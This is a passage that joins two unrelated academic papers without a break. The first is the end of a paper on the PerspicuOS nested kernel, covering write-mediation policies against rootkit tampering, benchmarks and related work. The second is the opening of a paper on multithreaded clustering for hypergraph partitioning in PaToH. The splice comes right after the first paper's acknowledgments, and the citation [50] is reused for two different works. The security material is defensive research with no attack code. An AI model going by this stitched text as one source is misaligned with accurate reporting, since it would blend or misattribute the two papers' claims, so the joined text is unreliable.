IDT and IDTR protections. We believe that these will not impact performance as modern OS kernels rarely modify the IDT and IDTR. We ported and implemented nested kernel calls for each function in Table 2. These calls perform the requested operation and verify that the value in the register is correct. We ported all instances of writes to MSRs to ensure the NX bit is always set in EFER; however, we did not fully implement no-execute page permissions in the PTPs. 
We do not believe these will negatively impact performance as the nested kernel already interposes on all MMU updates and sets other protection bits accordingly. We also implemented an offline scanner for the kernel binary; we have applied this to the entire core kernel but not to dynamically loaded kernel modules (this is a minor matter of engineering). Our current implementation uses coarse-grained synchronization even though our evaluation is on a uni-processor. It uses a single nested kernel stack with a lock to protect it from concurrent access. We did not implement protections for DMA writes or enforce nested kernel control on SMI events; however, we do not believe they will negatively impact performance because these are rare events under normal operation. Last, we did not fully implement all features to enforce Invariant 6; however, we did implement code that updates a PTE and flushes the TLB to simulate mapping and unmapping the code that modifies CR3. We believe this faithfully represents the performance costs of the full solution. ### 4. Enforcing Intra-Kernel Security Policies The nested kernel architecture permits kernel developers to employ fundamental design principles such as least privilege and complete mediation \cite{31}. In this section, we explore several intra-kernel security policies enabled by the nested kernel. Our examples demonstrate the nested kernel’s ability to combat key mechanisms used by well-known classes of kernel malware such as rootkits \cite{27}. We emphasize that our use cases do not completely solve specific high-level security goals (such as preventing rootkits from evading detection). However, they demonstrate specific key elements for complete solutions. Developing complete solutions is part of our ongoing work. #### 4.1 Nested Kernel Write Mediation Policies The nested kernel provides kernel developers with the ability to prevent or monitor memory writes at run-time. 
We illustrate three write-protection policies that this interface can enforce; each can be used for multiple security goals. 4.1.1 Write-Once Data Several kernel data structures are written to only once, when they are initialized. Other structures are initialized to default values and are only changed once during operation (e.g., the system call table). Our interface can protect these data with very low overhead. As such, PerspicuOS implements a simple, byte-granularity, write-once policy within the nested kernel. It is enforced by maintaining a bit-vector with one bit per byte, initialized to zeroes. When \texttt{nk\_write} is called, it uses a mediation function that checks whether each bit is set for the memory to be modified; if all the bits are clear, it writes the data and marks those corresponding bits as being written. We apply the write-once policy to protect the FreeBSD system call table by allocating the table within nested kernel-protected pages and selecting the write-once policy, guaranteeing that it can never be overwritten by malware after initialization. This application defends against kernel malware that “hook” system call dispatch by overwriting entries in the system call table to invoke exploit code [27], and could be extended to protect other key kernel code pointers. 4.1.2 Append-Only Data Operating systems also have append-only data structures such as circular buffers and event logs. These data structures reside in ordinary kernel memory and are vulnerable to kernel exploits, making them unreliable for forensics use. To protect such data structures, PerspicuOS implements an append-only write policy within the nested kernel. It is enforced by maintaining a “tail” pointer to a list structure within the nested kernel. Each call to \texttt{nk\_write} increments the tail pointer to ensure that writes never overwrite existing data within the region. A stricter policy could ensure that no gaps exist between successive writes. 
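The write-once and append-only policies above can be sketched as mediation functions. All names here are illustrative; the bitmap and tail pointer, which PerspicuOS would keep in protected nested kernel memory, are modeled as ordinary globals, and the functions take a region-relative offset rather than raw pointers.

```c
#include <stdbool.h>
#include <stddef.h>

#define REGION_SIZE 64

/* Write-once policy state: one bit per byte, set after the first write. */
static unsigned char once_bits[REGION_SIZE / 8];

static bool once_written(size_t i) { return once_bits[i / 8] & (1u << (i % 8)); }
static void once_mark(size_t i)    { once_bits[i / 8] |= 1u << (i % 8); }

/* Mediation function for the write-once policy: permit a write only if
 * none of the target bytes has been written before. */
static bool mediate_write_once(size_t off, size_t len) {
    if (off + len > REGION_SIZE)
        return false;
    for (size_t i = off; i < off + len; i++)
        if (once_written(i))
            return false;           /* byte already written once */
    for (size_t i = off; i < off + len; i++)
        once_mark(i);
    return true;
}

/* Append-only policy: a tail pointer kept in protected memory; writes
 * may never touch data before the tail.  (A stricter variant would
 * also require off == tail, forbidding gaps.) */
static size_t tail;

static bool mediate_append_only(size_t off, size_t len) {
    if (off < tail || off + len > REGION_SIZE)
        return false;               /* would overwrite existing data */
    tail = off + len;
    return true;
}
```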
A full solution must also be able to securely write the log to disk when full, which our prototype does not yet do. We used this policy to implement a system call event logger that records system call entry and exit events in a statically allocated, append-only buffer. System call recording has been a popular target in both research systems [22, 23, 32, 36] and security monitoring applications [19, 21, 26, 33, 35, 44, 52]. However, these systems are susceptible to attack [49]. By protecting the log buffer, we ensure that rootkits cannot hide traces of malicious system call events and strengthen security staffs’ ability to conduct forensics investigations after break-ins. Further effort is required to write the logs out to other media for long-term storage, and to defend against an attacker that spoofs security events. 4.1.3 Write Logging A rootkit’s primary goal is to hide itself and malicious processes and files. Therefore, rootkits often modify kernel data such as network counters, process lists, and system event logs [27]. Some of these data are challenging to protect because they are co-located within large kernel data structures; others cannot be protected by simple write-once and append-only policies. However, the ability to reliably monitor writes to such data enables detection of all malicious modifications. Therefore, we implement a general write-logging mechanism that records (and can later reconstruct) all writes to selected data structures. All calls to \texttt{nk\_write} for a memory region declared with this policy record the range of addresses modified and the values written into the memory. Again, this buffer must be periodically written to disk. As an example use case of the interface, we use write-logging to detect rootkits that attempt to hide processes by corrupting FreeBSD’s process list data structure: \texttt{allproc}.
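The write-logging policy can be modeled in the same hedged style; the names below are invented, and the sketch captures only the record-and-replay idea, not PerspicuOS's actual buffer layout.

```python
# Toy model of the write-logging policy: every mediated write is
# applied and simultaneously recorded, so the full write history can
# later be reconstructed by a forensics monitor.
class WriteLogRegion:
    def __init__(self, size):
        self.size = size
        self.data = bytearray(size)
        self.log = []  # list of (offset, bytes) entries, in write order

    def nk_write(self, offset, payload):
        self.log.append((offset, bytes(payload)))
        self.data[offset:offset + len(payload)] = payload

    def replay(self):
        # rebuild the region's final state from the log alone
        shadow = bytearray(self.size)
        for off, payload in self.log:
            shadow[off:off + len(payload)] = payload
        return shadow
```

`replay` shows why the log suffices for forensics: the region's final state, and every intermediate state, is fully reconstructible from the recorded writes.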
Instead of logging writes to \texttt{allproc} directly, we created a shadow \texttt{allproc} data structure that exactly mirrors the original list. Each shadow list entry contains a pointer back to the corresponding \texttt{allproc} entry, and any updates to the \texttt{allproc} list structure (e.g., unlinking a node) are also performed on the shadow list. More importantly, to fully hide the presence of a particular process from the kernel, the rootkit must use \texttt{nk\_write} to remove the shadow entry from the shadow list (which is logged). The logging of shadow list writes enables effective forensics. Security monitors can easily reconstruct the list updates and identify the prior existence of hidden processes. Moreover, we modified the \texttt{ps} program to query the shadow list instead of the \texttt{allproc} list so that it can detect the presence of hidden processes. 4.2 System Protection Policies The nested kernel architecture can also realize several system security properties because it controls all virtual memory mappings in the system. One example is lifetime kernel code integrity (as Section 3.5 explains). This single use case effectively thwarts an entire class of kernel malware (namely code injection attacks). In addition to code integrity, PerspicuOS also marks memory pages as non-executable by default and enables supervisor-mode execution prevention of user-mode code and data. Even if commodity kernels use these hardware features, they cannot prevent malware from disabling them. PerspicuOS, in contrast, enables these protections and prevents malicious code from disabling them. PerspicuOS can also be used for any type of security monitor that inserts explicit calls into source code to ensure that the monitor both executes and is isolated from the untrusted code. 5. Evaluation We evaluate PerspicuOS by investigating its impact on the TCB, the FreeBSD porting effort, the de-privileging scanner, and performance overheads.
We evaluated the overheads of PerspicuOS on a Dell Precision T1650 workstation with an Intel® Core™ i7-3770 processor at 3.4 GHz with 8 MB of cache, 16 GB of RAM, and an integrated PCIe Gigabit Ethernet card. Experiments requiring a network used a dedicated Gigabit Ethernet network; the client machine on the network was an Acer Aspire Revo R3700 with an Intel® Atom™ D525 processor at 1.8 GHz with 2 GB of RAM. We evaluate five systems for each of our tests: the original (unmodified) FreeBSD system, the base PerspicuOS, and each of our three use cases: append-only, which is for system call entry and exit recording; write-once, used for the system call table protection; and write-log, used for the shadow process list. The baseline for the syscall use case was the original FreeBSD modified to log system call entry and exit events. 5.1 Trusted Computing Base and Kernel Porting The nested kernel requires porting existing functionality in a commodity kernel to use the nested kernel operations. Our port of FreeBSD to the nested kernel architecture modified 52 files totaling ∼1900 LOC changed, including comments. The vast majority of deleted lines were in configuration or build-system files—ignoring these, only ∼100 LOC were eliminated in the port. Code modifications were measured using Git change logs. We measure the number of lines in the nested kernel with the SLOCCount tool [53]: the implementation consists of ∼4000 C SLOC and ∼800 assembly SLOC; the scanner was implemented in 248 Python SLOC. 5.2 Code Scanning Results To evaluate the feasibility of eliminating all instances of protected instructions from the outer kernel, we scanned our compiled kernels and subsequently used manual methods to eliminate all unaligned protected instructions. We found a total of 40 implicit instructions for writing to CR0 (2) and wrmsr (38).
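A drastically simplified sketch of such a scanner is shown below. The two opcode prefixes (`0F 22` for a move to a control register, `0F 30` for `wrmsr`) are real x86 encodings; everything else, including the sample image in the test, is illustrative and is not the 248-SLOC scanner itself.

```python
# Toy offline scanner: slide a 2-byte window over the kernel image and
# flag every offset at which a protected opcode sequence could be
# decoded, whether or not it falls on an intended instruction boundary.
PROTECTED = {
    b"\x0f\x22": "mov to control register",
    b"\x0f\x30": "wrmsr",
}

def scan(image):
    hits = []
    for off in range(len(image) - 1):
        tag = PROTECTED.get(bytes(image[off:off + 2]))
        if tag is not None:
            hits.append((off, tag))
    return hits
```

A hit list like this is the starting point for the alignment-adjustment and constant-splitting fixes described in Section 5.2.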
Most of these instances are due to constants embedded in the code used for relative addressing; therefore, we eliminated them by adjusting alignments, rearranging functions, and inserting nops. A few were due to particular sequences of arithmetic expressions; these were addressed by replacing them with equivalent computation. Finally, a small number of constants in the outer kernel code contained implicit instructions. These were addressed by replacing each constant with two others that were dynamically combined to create the equivalent value. 5.3 Privilege Boundary Microbenchmark To investigate the impact of different privilege crossings against the nested kernel architecture approach, we developed a simple microbenchmark that evaluates the round-trip cost into a null function for each privilege boundary: syscall, nested kernel call, and VMM call (hypercall). For the syscall boundary experiment we used the syscall instruction to invoke a special system call added to the kernel that immediately returns. The VMM boundary cost experiment is performed using a guest kernel consisting solely of VMCALL instructions in a loop executing within a VMM modified to resume the guest immediately after this instruction traps to the VMM. The nested kernel cost experiment uses an empty function wrapped with the entry and exit gates as described in Section 3.6.1. The microbenchmark performs each call one million times and reports total elapsed time. Each microbenchmark configuration was executed 5 times with negligible variance, and the computed average time per call is reported. Our results, shown in Table 3, indicate that a nested kernel call is approximately 3.69 times less expensive than a hypercall, motivating the performance benefits of implementing the nested kernel architecture at a single supervisor privilege level. User-mode to supervisor-mode calls are faster than nested kernel calls, which take approximately 1.59 times as long.
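The measurement methodology can be sketched as follows, assuming a wall-clock timer in place of whatever cycle counter the real benchmark reads; this is an illustrative harness, not the actual benchmark code.

```python
# Sketch of the microbenchmark methodology: call the boundary-crossing
# stub many times per run, repeat the run several times, and report the
# average time per call. time.perf_counter_ns stands in for a hardware
# cycle counter.
import time

def measure(call, iterations=1_000_000, runs=5):
    per_call = []
    for _ in range(runs):
        start = time.perf_counter_ns()
        for _ in range(iterations):
            call()
        elapsed = time.perf_counter_ns() - start
        per_call.append(elapsed / iterations)
    return sum(per_call) / runs  # average nanoseconds per call
```

Averaging over whole runs rather than timing individual calls keeps the timer's own overhead amortized across the loop.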
5.4 Micro-benchmarks To evaluate the effect that PerspicuOS has on system call performance, we ran experiments from the LMBench benchmark suite [50]. Figure 4 shows the results for our four systems relative to the original FreeBSD. In most cases, our systems are, at most, 1.25 times slower relative to the baseline (unmodified) FreeBSD kernel. mmap, fork+exit, and fork+exec, however, exhibit higher execution time overheads of approximately 2.5 to 3 times. This is because these benchmarks stress the vMMU with several consecutive calls to set up new address spaces. Upon investigation, we identified a small set of functions that were responsible for most of this behavior, and preliminary experiments showed a reduction of more than 60% when converting these to batch operations. In the future, we plan to extend the nested kernel interface to allow for batch updates to the vMMU in order to reduce overheads for these operations. We also observe that the write-once and write-log policies incur the same overheads as the base PerspicuOS system, whereas the append-only policy used for system call entry and exit recording incurs higher overheads. In fact, the worst relative overhead for this system is the null syscall benchmark; it occurs because each null system call makes two nested kernel operation calls. 5.5 Application Benchmarks To evaluate the overheads on real applications, we measured the performance of the FreeBSD OpenSSH server, the Apache httpd server running on the PerspicuOS kernel, and a kernel compile. We opted to use network servers as they exercise kernel functionality more heavily than many compute-bound applications and are therefore more likely to be impacted by kernel overhead. **OpenSSH Server:** For the OpenSSH experiments, we transferred files ranging from 1 KB to 16 MB in size from the server to the client. We transferred each file 20 times, measuring the average bandwidth achieved each time.
Figure 5 shows the average bandwidth overhead, relative to native, for each file size transferred. The maximum bandwidth reduction is 20% for 1 KB files. Transferring files above 64 KB in size incurs less than a 2% reduction in bandwidth. **Apache:** For the Apache experiments, we used Apache’s benchmark tool ab to perform 10000 requests using 32 concurrent connections over a 1 Gbps network for file sizes ranging from 1 KB to 1 GB. We performed this experiment 20 times for each file size, and present the results in Figure 6. The results reveal negligible overheads, within the standard deviation of the measurements. **Kernel Build:** The kernel build experiment cleaned and built a FreeBSD kernel from scratch for a total of 3 runs; Table 4 reports the overhead relative to native.

---

**Table 4.** Kernel Build Overhead over Native.

<table>
<thead>
<tr>
<th>PerspicuOS</th>
<th>AppendOnly</th>
<th>WriteOnce</th>
<th>WriteLog</th>
</tr>
</thead>
<tbody>
<tr>
<td>2.6%</td>
<td>3.3%</td>
<td>2.6%</td>
<td>2.7%</td>
</tr>
</tbody>
</table>

---

**Figure 5.** SSHD Average Bandwidth.

**Figure 6.** Apache average bandwidth.

---

6. Future Work There are several directions for future work. First, we plan to investigate methods for removing mediation functions from the TCB. Mediation functions do not need to write to protected memory and could be excluded from the TCB by running them with write protections enabled. Second, although the nested kernel provides a sufficient interface to protect data structures, techniques are needed to ensure that policy-enforcing code stores all critical data within the nested kernel. Third, we plan to formally verify PerspicuOS’s design to improve assurance of its correctness. Additionally, we will explore applications of PerspicuOS. For example, moving the memory allocator into the nested kernel could protect the kernel from memory safety attacks that overwrite allocator meta-data.
Additionally, we could move the access control functionality into the nested kernel, thereby ensuring that attacks on the operating system kernel cannot subvert its access controls. 7. Related Work The core contributions of this work include a new OS organization, the nested kernel architecture, for providing privilege separation and isolation within a single monolithic kernel, and a unique method for implementing it on commodity hardware with PerspicuOS. **Operating System Organizations.** Several alternative operating system designs provide privilege separation and memory isolation, including microkernels, ExoKernels, and separation kernels. OSes written in type-safe languages also provide inherent security improvements \cite{4,9,32}. While these approaches isolate kernel components and mediate access to critical data structures, they completely abandon commodity OS design. **MMU Protections.** The nested kernel architecture isolates the MMU by modifying the outer kernel so that MMU updates can be mediated, and exports an interface similar to those of related efforts including Xen \cite{7}, SVA-OS \cite{13,15,20} and paravirt-ops \cite{54}. Although the interface is similar, the nested kernel architecture employs different vMMU policies to protect and virtualize the MMU, and introduces de-privileging to isolate the nested kernel. SecVisor employs MMU policies similar to those of PerspicuOS to enforce kernel code integrity \cite{43}; however, SecVisor relies on special nested paging hardware support that implicitly traps on certain hardware events, which is both external to the kernel and has higher costs per invocation than PerspicuOS. **Intra-Kernel Memory Isolation.** SILVER \cite{55} and UCON \cite{56} specify policy frameworks (similar to mandatory access control) to enforce access control policies on internal kernel objects using VMM hardware.
SILVER exports an access control service that is used by the operating system to specify principals and object ownership access policies through the memory allocator, which are then enforced by the VMM. In contrast, PerspicuOS uses the x86-64 \( WP \)-bit to provide a memory isolation mechanism on which SILVER access control policies could be overlaid. Nooks \cite{46} provides lightweight protection domains for kernel drivers and modules. Nooks uses the hardware MMU to create protection domains and changes hardware page tables when transferring control between the core kernel and the kernel driver. Although Nooks provides reliability guarantees, it does not consider isolation from malicious entities, and is therefore susceptible to attack. **Compiler-Based Intra-Kernel Memory Isolation.** Several previous efforts \cite{10,18} employ software fault isolation (SFI) and control-flow integrity (CFI) to isolate kernel components. These systems utilize heavyweight compiler instrumentation in addition to address translation policies to isolate kernel components. LXFI \cite{29} uses programmer annotations to specify interface policy rules between kernel extensions and the core kernel and inserts run-time checks to enforce these rules. In contrast, PerspicuOS does not require compiler-based enforcement mechanisms, alleviates the need for kernel control-flow integrity, and removes the core kernel from the TCB. **Hypervisor-Based Isolation.** Both SVA \cite{15} and HyperSafe \cite{50} employ the MMU and the \( WP \)-bit to prevent privileged system software from making errant changes to page tables. However, these approaches require control-flow integrity, and furthermore the HyperSafe work claimed that using the WP approach on a monolithic kernel would be too challenging due to shared code and data pages. Several approaches deploy security monitors to protect and record certain kernel events; each has drawbacks.
Several such approaches place the monitor in the same TCB as the untrusted code, leaving them vulnerable to attack \cite{31,37,47}. Other systems, namely Lares \cite{35} and the In-VM monitor SIM \cite{44}, place the monitor in a VMM (using nested paging support) to provide integrity guarantees about the isolation and invocation of the security monitor. These systems suffer from high performance costs \cite{35} or assume integrity of the code region \cite{44}. VMM-based monitors must also address VMM introspection problems: the monitor does not understand the semantics of kernel data structures \cite{19,24}. In PerspicuOS, security monitors are isolated from the monitored system, can be invoked much more efficiently via direct nested kernel operations instead of expensive VMM hypercalls, and completely avoid the VMM introspection problem. KCoFI \cite{14}, SecVisor \cite{43}, and NICKLE \cite{38} provide kernel code integrity. SecVisor and NICKLE also ensure that only authorized code runs in the processor’s privileged mode. PerspicuOS enforces the same policies, but also includes a novel memory isolation mechanism. **8. Conclusion** This paper presents the nested kernel architecture, a new OS organization that provides important security benefits to commodity operating systems, and shows that it can be retrofitted to an existing monolithic kernel. We show that the two nested kernel architecture components, the nested kernel and the outer kernel, can co-exist in the highest hardware protection level in a common address space without compromising the isolation guarantees of the system. The nested kernel architecture can efficiently support useful write-mediation policies, such as write-once and append-only, which OS developers can use to incorporate new security policies with very low performance overheads.
More broadly, we expect that the nested kernel architecture can improve OS security by enabling OS developers to incorporate richer security principles like complete mediation, least privilege, and least common mechanism, for selected OS functionality. **Acknowledgments** The authors would like to thank Audrey Dautenhahn for her editorial services, and Maria Kotsifakou, Prakalp Srivastava, and Matthew Hicks for refining our ideas via technical and writing discussions. Our shepherd Peter Druschel and the anonymous reviewers provided valuable feedback that greatly enhanced the quality of this paper. This work was sponsored by ONR via grant number N00014-12-1-0552 and supported in part by ONR via grant number N00014-4-1-0525, MURI via contract number AF Subcontract UCB 00006769, and NSF via grant number CNS 07-09122.
Multithreaded clustering for multi-level hypergraph partitioning. Umit V. Catalyurek, Mehmet Deveci, Kamer Kaya, Bora Uçar. 26th IEEE International Parallel and Distributed Processing Symposium, IPDPS 2012, May 2012, Shanghai, China. pp. 848–859, 10.1109/IPDPS.2012.81. HAL Id: hal-00763565, https://inria.hal.science/hal-00763565, submitted on 19 Dec 2019. Multithreaded Clustering for Multi-level Hypergraph Partitioning Ümit V. Çatalyürek, Mehmet Deveci, Kamer Kaya The Ohio State University Dept. of Biomedical Informatics {umit,mdeveci,kamer}@bmi.osu.edu Bora Uçar CNRS and LIP, ENS Lyon Lyon 69364, France bora.ucar@ens-lyon.fr Abstract—Requirements for efficient parallelization of many complex and irregular applications can be cast as a hypergraph partitioning problem. The current state-of-the-art software libraries that provide tool support for the hypergraph partitioning problem were designed and implemented before the game-changing advancements in multi-core computing. Hence, analyzing the structure of those tools in order to design multithreaded versions of their algorithms is a crucial task. The most successful partitioning tools are based on the multi-level approach.
In this approach, a given hypergraph is coarsened to a much smaller one; a partition is obtained on the smallest hypergraph, and that partition is projected to the original hypergraph while being refined on the intermediate hypergraphs. The coarsening operation corresponds to clustering the vertices of a hypergraph and is the most time-consuming task in a multi-level partitioning tool. We present three efficient multithreaded clustering algorithms which are well suited for multi-level partitioners. We compare their performance with that of the ones currently used in today’s hypergraph partitioners. We show on a large number of real-life hypergraphs that our implementations, integrated into the commonly used partitioning library PaToH, achieve good speedups without reducing the clustering quality. Keywords—Multi-level hypergraph partitioning; coarsening; multithreaded clustering algorithms; multicore programming I. INTRODUCTION Hypergraph partitioning is an important problem widely encountered in the parallelization of complex and irregular applications from various domains including VLSI design [1], parallel scientific computing [2], [3], sparse matrix reordering [4], static and dynamic load balancing [5], software engineering [6], cryptosystem analysis [7], and database design [8], [9], [10]. Being such an important problem, considerable effort has been put into providing tool support; see hMeTiS [11], MLpart [12], Mondriaan [13], Parkway [14], PaToH [15], and Zoltan [16]. All the tools above follow the multi-level approach. This approach consists of three phases: coarsening, initial partitioning, and uncoarsening. In the coarsening phase, the original hypergraph is reduced to a much smaller hypergraph after a series of coarsening levels. At each level, vertices that are deemed to be similar are grouped to form vertex clusters, and a new hypergraph is formed by unifying each cluster into a single vertex. That is, the clusters become the vertices for the next level.
In the initial partitioning phase, the coarsest hypergraph is partitioned. In the uncoarsening phase, the partition found in the second phase is projected back to the original hypergraph, and the partition is locally refined on the hypergraphs associated with each coarsening level. The coarsening phase is the most important phase of the multi-level approach, for the following three reasons. First, the worst-case running time complexity of this phase is higher than that of the other two phases (the initial partitioning and uncoarsening phases have, in most common implementations, linear worst-case running time complexity). Second, as the uncoarsening phase performs only local improvements, the quality of a partition is highly affected by the quality of the coarsening phase. For example, given a hypergraph, a coarsening algorithm, a conventional initial partitioning algorithm, and a refinement algorithm based on the most common ones, very slight variations in vertex similarity metrics can affect the performance quite significantly (see for example the start of Section 5.1 of [17]). Third, it is usually the case that the better the coarsening, the faster the uncoarsening phase. Therefore, the coarsening phase also affects the running time of the other phases. Our aim in this paper is to efficiently parallelize the coarsening phase of PaToH, a well-known and commonly used hypergraph partitioning tool. The algorithmic kernel of this phase is a clustering algorithm that marks similar vertices to be coalesced. There are two classes of clustering algorithms in PaToH. The algorithms in the first class allow at most two vertices in a cluster. These algorithms are called matching-based algorithms, or matching algorithms in short. The algorithms in the second class, called agglomerative algorithms, allow any number of vertices to come together to form a cluster. The most effective clustering algorithms in PaToH are the agglomerative ones, whereas the fastest are matching-based.
We propose efficient parallelization of these two classes of algorithms (Section III). We report practical experiments with PaToH (and its coarsening phase alone) on a recent multicore architecture (Section IV). Our techniques are easily applicable to some other sequential hypergraph partitioners, since they use the same multilevel approach and have similar data structures. II. BACKGROUND, PROBLEM FORMULATION AND RELATED WORK A. Hypergraph Partitioning A hypergraph $\mathcal{H} = (\mathcal{V}, \mathcal{N})$ is defined as a set of vertices $\mathcal{V}$ and a set of nets (hyperedges) $\mathcal{N}$ among those vertices. A net $n \in \mathcal{N}$ is a subset of vertices, and the vertices in $n$ are called its pins. The size of a net is the number of its pins, and the degree of a vertex is equal to the number of nets that contain it. A graph is a special instance of a hypergraph in which each net has size two. We use $\text{pins}[n]$ and $\text{nets}[v]$ to represent the pins of a net $n$, and the set of nets that contain vertex $v$, respectively. Vertices can be associated with weights, denoted with $w[\cdot]$, and nets can be associated with costs, denoted with $c[\cdot]$. A $K$-way partition of a hypergraph $\mathcal{H}$ is denoted as $\Pi = \{V_1, V_2, \ldots, V_K\}$ where - parts are pairwise disjoint, i.e., $V_k \cap V_\ell = \emptyset$ for all $1 \leq k < \ell \leq K$, - each part $V_k$ is a nonempty subset of $\mathcal{V}$, i.e., $V_k \subseteq \mathcal{V}$ and $V_k \neq \emptyset$ for $1 \leq k \leq K$, - the union of the $K$ parts is equal to $\mathcal{V}$, i.e., $\bigcup_{k=1}^{K} V_k = \mathcal{V}$. In a partition $\Pi$, a net that has at least one pin (vertex) in a part is said to connect that part. The number of parts connected by a net $n$, i.e., its connectivity, is denoted as $\lambda_n$. A net $n$ is said to be uncut (internal) if it connects exactly one part (i.e., $\lambda_n = 1$), and cut (external) otherwise (i.e., $\lambda_n > 1$).
Let $W_k$ denote the total vertex weight in $V_k$ (i.e., $W_k = \sum_{v \in V_k} w[v]$) and $W_{avg}$ denote the weight of each part when the total vertex weight is equally distributed (i.e., $W_{avg} = (\sum_{v \in \mathcal{V}} w[v]) / K$). If each part $V_k \in \Pi$ satisfies the balance criterion $$W_k \leq W_{avg}(1 + \varepsilon), \quad \text{for } k = 1, 2, \ldots, K$$ we say that $\Pi$ is balanced where $\varepsilon$ represents the maximum allowed imbalance ratio. The set of external nets of a partition $\Pi$ is denoted as $\mathcal{N}_E$. Let $\chi(\Pi)$ denote the cost, i.e., cutsize, of a partition $\Pi$. There are various cutsize definitions [1] such as: $$\chi(\Pi) = \sum_{n \in \mathcal{N}_E} c[n]$$ $$\chi(\Pi) = \sum_{n \in \mathcal{N}} c[n](\lambda_n - 1).$$ In (2) and (3), each cut net $n$ contributes $c[n]$ and $c[n](\lambda_n - 1)$ to the cutsize, respectively. The cutsize metric given in (2) will be referred to here as cut-net metric and the one in (3) will be referred as connectivity metric. Given $\varepsilon$ and an integer $K > 1$, the hypergraph partitioning problem can be defined as the task of finding a balanced partition $\Pi$ with $K$ parts such that $\chi(\Pi)$ is minimized. The hypergraph partitioning problem is NP-hard [1]. B. Clustering algorithms for hypergraph partitioning As said before, there are two classes of clustering algorithms: matching-based ones and agglomerative ones. The matching-based ones put at most two similar vertices in a cluster whereas the agglomerative ones allow any number of similar vertices. There are various similarity metrics—see for example [2], [18], [19]. All these metrics are defined on two adjacent vertices (one of them can be a vertex cluster). Two vertices are adjacent if they share a net, i.e., the vertices $u$ and $v$ are matchable if $\mathcal{N}_{uv} = \text{nets}[u] \cap \text{nets}[v] \neq \emptyset$. 
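Both cutsize metrics follow directly from these definitions. The sketch below uses plain dictionaries with invented names rather than PaToH's actual data structures.

```python
# Compute the cut-net metric (2) or the connectivity metric (3) of a
# partition. `pins` maps each net to its pin list, `cost` maps nets to
# costs, and `part` maps each vertex to its part index.
def cutsize(pins, cost, part, metric="connectivity"):
    total = 0
    for n, pin_list in pins.items():
        lam = len({part[v] for v in pin_list})  # connectivity lambda_n
        if metric == "cutnet":
            if lam > 1:                  # cut nets contribute c[n]
                total += cost[n]
        else:
            total += cost[n] * (lam - 1)  # c[n] * (lambda_n - 1)
    return total
```

Note that under the connectivity metric an internal net ($\lambda_n = 1$) contributes nothing, matching equation (3).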
In order to find a given vertex $u$’s adjacent vertices, one needs to visit each net $n \in \text{nets}[u]$ and then visit each vertex $v \in \text{pins}[n]$. Therefore, the computational complexity of the clustering algorithms is at least in the order of $\sum_{n \in \mathcal{N}} |\text{pins}[n]|^2$. As mentioned in the introduction, the other two phases of the multi-level approach have linear worst-case time complexity. As $\sum_{n \in \mathcal{N}} |\text{pins}[n]|^2$ is most likely to be the bottleneck, an effective clustering algorithm’s worst-case running time should not exceed this bound if it is also to be efficient. The sequential implementations of the clustering algorithms in PaToH proceed in the following way to achieve a running time proportional to $\sum_{n \in \mathcal{N}} |\text{pins}[n]|^2$. The vertices are visited in a given (possibly random) order, and each vertex $u$ that is not yet clustered is clustered, if possible, with the most similar vertex or cluster. In the matching-based algorithms, the current vertex $u$, if not matched yet, chooses one of its unmatched adjacent vertices according to a criterion. If such a vertex $v$ exists, the matched pair $u$ and $v$ are marked as a cluster of size two. If there is no unmatched adjacent vertex of $u$, then vertex $u$ remains a singleton cluster. In the agglomerative algorithms, the current vertex $u$, if not marked to be in a cluster yet, can choose a cluster to join (thus forming a cluster of size at least three), or can create another cluster with one of its unmatched adjacent vertices (thus forming a cluster of size two). Hence in agglomerative clustering, vertex $u$ never remains a singleton, as long as it is not isolated (i.e., not connected to any net). For the clustering algorithms in this paper, there exists a representative vertex for each cluster. When a vertex $u \in \mathcal{V}$ is put into a cluster, we set $\text{rep}[u]$ to the representative of this group.
When a singleton vertex $u$ chooses another one $v$, we choose one of them as the representative and set $\text{rep}[u]$ and $\text{rep}[v]$ accordingly. For all the algorithms, we assume that $\text{rep}[u]$ is initially null for all $u \in \mathcal{V}$; this remains true if $u$ is still a singleton at the end of the algorithm. Algorithm 1 presents one of the matching-based clustering algorithms that are available in PaToH. In this algorithm, the vertex $u$ (if not matched yet) is matched with the currently unmatched neighbor $v$ with the maximum connectivity, where the connectivity refers to the sum of the costs of the common nets. This matching algorithm is called Heavy Connectivity Matching (HCM) in PaToH [2], and Inner Product Matching (IPM) in Zoltan [20] and Mondriaan [13]. One can obtain different variations of this algorithm by changing the vertex visit order (line 1) and/or using different scaling schemes while computing the contribution of each net to its pins (line 6). The array `conn[ ]` of size $|\mathcal{V}|$ is necessary to compute the connectivity between the vertex $u$ and all its adjacent vertices in time linearly proportional to the number of adjacent vertices. The operation at line 3 is again for efficiency: it removes the matched vertices from `pins[n]`, hence subsequent searches on `pins[n]` will take less time. Algorithm 2 presents one of the agglomerative clustering algorithms that are available in PaToH. Similar to the sequential HCM algorithm, vertices are again visited in a given order. If a vertex `u` has already been clustered, it is skipped. However, an unclustered vertex `u` can choose to join an existing cluster, can start a new cluster with a vertex, or can stay as a singleton cluster. Therefore, compared to the previous algorithm, all adjacent vertices of the current vertex `u` are considered for selection.
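As a hedged illustration of the greedy selection in Algorithm 1 (this is not PaToH's source; the `xnets`/`netsv` and `xpins`/`pins` CSR-like arrays and all names are our assumptions), a sequential HCM pass might look like:

```c
/* Illustrative sketch of sequential heavy-connectivity matching (HCM).
 * Nets of vertex u: netsv[xnets[u] .. xnets[u+1]-1];
 * pins of net n:    pins[xpins[n] .. xpins[n+1]-1];
 * rep[u] == -1 means u is unmatched; conn[] must be zero-initialized. */
static void hcm(int nverts, const int *xnets, const int *netsv,
                const int *xpins, const int *pins, const int *cost,
                int *rep, int *conn) {
    for (int u = 0; u < nverts; u++) {
        if (rep[u] != -1) continue;     /* u already matched */
        int best = -1, bestconn = 0;
        /* accumulate connectivity of u to each unmatched neighbor */
        for (int i = xnets[u]; i < xnets[u + 1]; i++) {
            int n = netsv[i];
            for (int j = xpins[n]; j < xpins[n + 1]; j++) {
                int v = pins[j];
                if (v == u || rep[v] != -1) continue;
                conn[v] += cost[n];     /* common net n contributes c[n] */
                if (conn[v] > bestconn) { bestconn = conn[v]; best = v; }
            }
        }
        /* reset conn[] for the next vertex by revisiting the neighbors */
        for (int i = xnets[u]; i < xnets[u + 1]; i++) {
            int n = netsv[i];
            for (int j = xpins[n]; j < xpins[n + 1]; j++) conn[pins[j]] = 0;
        }
        if (best != -1) { rep[u] = best; rep[best] = u; }
    }
}
```

The second pass over the neighbors resets `conn[]` without touching the whole array, which is what keeps the per-vertex work proportional to the number of adjacent vertices, as described above.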
